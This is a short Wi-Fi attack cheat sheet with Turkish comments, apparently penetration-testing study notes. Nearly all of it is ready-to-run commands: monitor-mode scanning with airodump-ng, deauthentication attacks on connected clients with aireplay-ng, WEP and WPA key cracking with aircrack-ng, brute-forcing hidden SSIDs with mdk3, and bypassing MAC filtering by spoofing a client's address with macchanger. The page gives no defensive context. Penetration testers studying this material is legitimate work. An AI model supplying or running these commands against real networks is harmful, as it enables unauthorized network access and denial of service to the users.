Page

iwconfig # Wireless Interfaces

airmon-ng start wlan0 # Monitor mode
airmon-ng stop wlan0mon # Managed mode


airodump-ng wlan0mon # Monitor etme
airodump-ng -c 11 wlan0mon # Channel tarama
airodump-ng wlan0mon -c 11 --bssid <AP_BSSID>

airodump-ng wlan0mon --band a # 5ghz
airodump-ng wlan0mon --band bg # 2.4GHZ
airodump-ng wlan0mon --band abg # Hepsi

airodump-ng wlan0mon -w tarama # Kayıt etme

airgraph-ng -i tarama.csv -g CAPR -o tarama_CAPR.png # Clientlar nereye bağlı grafiği
airgraph-ng -i tarama.csv -g CPG -o tarama_CPG.png # Clienler nereye bağlanmaya çalışıyor

aireplay-ng --test wlan0mon # Injection destekleyen APler
aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon # Deauth saldırısı


# Capture dosyası okuma
airdecap-ng -b <AP_BSSID> capture.cap
airdecap-ng -w <WEP_KEY> capture.cap
airdecap-ng -p <WPA_PASSWORD> capture.cap -e <AP_ESSID>

# Kırma
aircrack-ng -K WEP.ivs # WEP Crack
aircrack-ng WPA.pcap -w <WORDLIST> # Crack WPA 

HIDDEN SSID

airmon-ng start wlan0
airodump-ng wlan0mon

airodump-ng wlan0mon -c 11 --bssid <AP_BSSID>
aireplay-ng -0 10 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon


#upper case (u)
#digits (n)
#all printed (a)
#lower and upper case (c)
#lower and upper case plus numbers (m)
mdk3 wlan0mon p -b u -c 1 -t <AP_BSSID>
mdk3 wlan0mon p -f <WORDLIST> -t <AP_BSSID>

Mac Filtering

# MAC Filtering olan ağı izliyoruz
# Ağa bağlı olan bir clientın mac adresini kopyalıyoruz
airodump-ng wlan0mon -c 11 --bssid <AP_BSSID>


macchanger wlan0
ifconfig wlan0 down
# Bu MAC adresini kopyalıyoruz
macchanger wlan0 -m <CLIENT_MAC>
ifconfig wlan0 up

Kaynaklar

• Wi-Fi Penetration Testing Basics

• Wired Equivalent Privacy (WEP) Attacks

• Attacking Wi-Fi Protected Setup (WPS)

• Attacking WPA/WPA2 Wi-Fi Networks

• Wi-Fi Evil Twin Attacks

• Bypassing Wi-Fi Captive Portals